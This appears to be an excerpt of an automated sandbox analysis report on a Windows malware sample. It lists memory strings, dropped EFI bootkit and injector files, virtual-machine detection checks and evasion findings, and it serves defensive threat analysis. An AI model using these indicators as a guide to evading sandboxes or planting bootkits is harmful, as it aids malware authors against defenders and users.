VMSRVC.EXESVCHOST.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESIHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXECTFMON.EXEVMSRVC.EXEVMUSRVC.EXEEXPLORER.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESEARCHUI.EXESEARCHUI.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEHXTSR.EXEHXTSR.EXE$
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGEMBEDDED/%SFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTORANNIS.COMPARSE ERRORPROCESS: %SRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITETASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION=183WININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp Binary or memory string: VMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXECONHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEUSOCLIENT.EXEUSOCLIENT.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESGRMBROKER.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXESVCHOST.EXESPOOLSV.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESIHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXECTFMON.EXEEXPLORER.EXESVCHOST.EXEDLLHOST.EXESEARCHUI.EXESEARCHUI.EXESVCHOST.EXEHXTSR.EXEHXTSR.EXE
Source: csrss.exe Binary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PAR
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: VMSRVC.EXEVMUSRVC.EXESMSS.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXEWININIT.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXEWINLOGON.EXEVMSRVC.EXEVMUSRVC.EXESERVICES.EXEVMSRVC.EXEVMUSRVC.EXELSASS.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDWM.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEPATH=C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH;C:\WINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPS
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: VMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXE@
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efi
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\bootx64.efi
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Windows\windefender.exe
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efi
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)
Is looking for software installed on the system
Source: C:\Windows\rss\csrss.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened / queried: VBoxGuest
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened / queried: vmci
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened / queried: HGFS
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened / queried: VBoxTrayIPC
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe File opened / queried: VBoxMiniRdrDN
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process information queried: ProcessInformation
Source: csrss.exe Binary or memory string: derivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousev
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: vmsrvc.exevmusrvc.exesmss.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exewininit.exevmsrvc.exevmusrvc.execsrss.exevmsrvc.exevmusrvc.exewinlogon.exevmsrvc.exevmusrvc.exeservices.exevmsrvc.exevmusrvc.exelsass.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedwm.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps
Source: csrss.exe Binary or memory string: ayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp Binary or memory string: vmusrvc.exe
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
Source: csrss.exe Binary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero par
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: svchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exespoolsv.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesihost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exectfmon.exevboxtray.exevboxservice.exeexplorer.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exeSearchUI.exesearchui.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exedwm.exe$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exevmmouse$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: qemuvirtual
Source: csrss.exe Binary or memory string: ionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:asc
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: is unavailable()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWDefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleEfiGuardDxe.efiElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaIdempotency-KeyImpersonateSelfInstall failureIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327647157.00000000160E2000.00000004.00000001.sdmp Binary or memory string: vmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.execonhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeUsoClient.exeusoclient.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesgrmbroker.exevmsrvc.exevmusrvc.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exe
Source: csrss.exe Binary or memory string: rinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwua
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: smss.execsrss.exewininit.execsrss.exewinlogon.exeservices.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exedllhost.exesvchost.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exeUsoClient.exeusoclient.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesgrmbroker.exesvchost.exe4t4y4r89uz.exevmci$
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: GPU3LFU_3R1CloseHandleS-1-5-18nehalemkvmqemuvirtualpersoconProcess32FirstW[system process]vboxtray.exevboxservice.exeProcess32NextWSystemsystemvboxtray.exevboxservice.exeRegistryregistry
Source: csrss.exe Binary or memory string: T_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:
Source: csrss.exe Binary or memory string: minal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)clo
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: csrss.exe Binary or memory string: licesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB) Value addr= base code= ctxt: curg= goid jobs= list= m->p= next= p->m= prev= span=%s: %s(...) , not , val -BEFV--DYOR-
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad RST markerbad allocCountbad record MACbad span statebad stack sizebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removedexit status -1file too largefinalizer waitgcstoptheworldgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedlookup TXT: %wmemprofilerateneed more datanil elem type!no module datano such deviceparse cert: %wprotocol errorread certs: %wreport_id is 0runtime: base=runtime: full=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytimeEndPeriodtoo many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
Source: csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp Binary or memory string: 11VBoxSFVT(%d)WINDIRWib
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: systemvboxtray.exe
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.webp156253.2.2500015000250003500045000550006560015600278125:***@:path<nil>AdlamAprilAttr(BamumBatakBuhidCall CountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521PGDSERangeRealmRunicSTermTakriTamilTypeAUUID=\u202allowarraybad nblackbrookchdirclosecloudcsrssdreamemptyfalsefaultfieldfloatfrostgcinggladegrassgreenhttpsimap2imap3imapsint16int32int64matchmistymkdirmonthmuddynightntohspanicpaperparsepgdsepop3sproudquietrangeriverrmdirroughrouterune sdsetshapesleepslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB)
Source: csrss.exe Binary or memory string: verenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value>
Source: csrss.exe Binary or memory string: nInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc() unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: acceptactiveautumnbitterbreezebrokenchan<-cherryclosedcookiedivinedomaindwarf.efenceempty exec: expectfloralflowerforestfrostygopherhangupheaderhiddenip+netkilledlistenlittlelivelymeadowminutenumberobjectpopcntpurplereadatreasonremoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> dying= flags= len=%d locks= m->g0= nmsys= s=nil
Source: csrss.exe Binary or memory string: rayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-lang
Source: csrss.exe Binary or memory string: main.isRunningInsideVMWare
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: entersyscallexit status found av: %sgcpacertracegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseFloatPhoenicianProcessingPulseEventRST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8casgstatuscmd is nilcomplex128connectiondnsapi.dlldsefix.exedwarf.Attre.keff.orgexitThreadexp mastergetsockoptgoroutine http_proxyimage/jpegimage/webpinvalidptrkeep-alivemSpanInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc()
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknamehttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextorannis.comparse errorprocess: %sraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion=183wininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
